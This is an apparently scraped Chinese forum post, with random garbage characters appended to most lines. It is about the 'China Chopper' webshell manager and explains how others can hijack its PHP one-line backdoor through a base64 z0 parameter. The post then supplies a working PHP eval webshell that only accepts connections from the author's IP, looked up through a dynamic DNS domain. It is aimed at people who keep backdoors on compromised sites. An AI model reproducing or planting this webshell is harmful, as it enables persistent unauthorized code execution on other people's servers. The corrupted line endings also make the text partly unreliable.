今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
G( d* g: G0 |- h3 ^3 ~9 r5 q x3 R! o5 @$ v
就算你设置了密码,使用了eval($_REQUEST['moyo']);& j" f1 B- u1 D. i, X$ z
" ~6 g1 |5 e. \ B! n r/ d5 P
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
2 B" o4 S, w1 H% |* Q) y
# c+ W* P7 d" Z6 o( @1 e因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
! j, ^- K$ G D0 P3 ^9 ]! N2 T+ i5 h) r/ F4 I( _
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了3 c2 a' C2 F0 L! k
$ W, F1 X, k, g不知道是设计缺陷还是故意留的后门
% X: g9 [9 p y9 F, }( B4 R
) P3 ?% [( j% B+ M如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用* }! y% N- b$ K9 b r. [+ D% Z
( L, y9 u, x. b本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
1 R4 G. y* y0 G$ b9 R; t/ @6 A( q
9 ?4 |, F8 R* N) e' y然后一句话后门这样写3 [! } P5 W3 {5 `. M
. @4 _; J( o* _, G1 H<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>3 B8 X9 O3 V* o# P% Y: I: ?
这样就可以让一句话后门只允许自己的电脑连接了
" J# j) ^! s; ~* M: r1 v1 z' e1 F- n$ E) y5 @7 |5 ?" y
|